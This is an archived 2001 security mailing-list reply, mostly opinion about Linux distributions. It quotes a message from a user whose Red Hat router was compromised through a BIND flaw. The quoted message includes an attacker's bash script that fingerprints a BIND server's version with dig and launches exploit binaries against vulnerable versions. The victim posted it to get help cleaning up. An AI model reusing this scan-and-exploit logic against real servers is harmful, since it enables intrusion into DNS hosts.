Re: bind 8.2.2_P5-9 in RH6.2

From: Dennis Stout (crazyman@rogershsa.com)
Date: 08/16/01


Message-ID: <003301c1260d$6d6d6240$020aa8c0@borg.net>
From: "Dennis Stout" <crazyman@rogershsa.com>
To: <security-discuss@linuxsecurity.com>
Subject: Re: bind 8.2.2_P5-9 in RH6.2
Date: Wed, 15 Aug 2001 20:39:24 -0800

RedHat is highly insecure on an out of hte box install to begin with, and
their support people, while entirely there compared to any other
distrobution, simply isn't too smart. *shrugs*

A typical Slackware install does ipmasq'ing quiet well and my router I jerry
rigged a year ago hasn't had any successful hacking attempts yet. I've
heard Debian is just as good, and same with SuSE. I don't have any first
hand knowledge of that tho. But everyone tells me RedHat people are too
full of themselves to be any good *shrugs*

Dennis

P.S. No offence intended. But ego's must be deflated inorder to keep the
status qou...

----- Original Message -----
From: "P Krab" <kr_balaji326@hotmail.com>
To: <security-discuss@linuxsecurity.com>
Sent: Wednesday, August 15, 2001 11:04 AM
Subject: bind 8.2.2_P5-9 in RH6.2

> Hi all,
>
> I have a 486 running RH6.2 setup as a ipmasq router, so me and my
housemates
> can share our cable connection. Ran a DNS also on it, so queries would be
> faster. But got hacked a few days back thru some flaw in Bind 8.2.2, and
so
> upgraded to 8.2.3 as recommended by RH support site.
> I found 2 or 3 directories (inside /var/spool/cron) created by this hack
> with some scripts in them, and deleted them all. But somehow, they kept
> starting up from some new dir. Could someone tell me how this happens? The
> script that runs is :
> --------------------------------
> #!/bin/bash
> # Part added to the original scan put-together by em1nem by EponaRhi
> # Thanks to etC for the bind scan that this came from ...
> #
> dig @$1 VERSION.BIND chaos txt +retry=2 +time=2 +ignore > temp.dig
> ver="`cat temp.dig |grep "VERSION.BIND\." |awk -F '"' '{print $2}'`"
> echo -en "Version $ver ... "
> for versiune in $(cat xlist|awk '{print $1}'); do
> if [ "$ver" = "4.9.6-REL" ]; then
> ./x496 $1
> break
> fi
> if [ "$versiune" = "$ver" ]; then
> ./bind $1 -e
> fi
> done
> rm -f temp.dig
> --------------------------------------------
> There are 2 other scripts, but I didnt know if its appropriate to post
them
> here. 'C' files in the dir (bind.c, scan.c, x496.c) are compiled and
called
> by these scripts. Any help in cleaning out my puter would be greatly
> appreciated.
>
> Also, I traced a login back to an IP that is a web server seemingly
> belonging to some corpn. Is it possible for someone to spoof his IP while
> trying the hack, or can I be sure that it originated from one of the
corpn's
> servers??
>
> Thanks,
> balaji.
>
> --
> Balaji Rangaswamy
>
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
>
> ------------------------------------------------------------------------
> To unsubscribe email security-discuss-request@linuxsecurity.com
> with "unsubscribe" in the subject of the message.
>

------------------------------------------------------------------------
     To unsubscribe email security-discuss-request@linuxsecurity.com
         with "unsubscribe" in the subject of the message.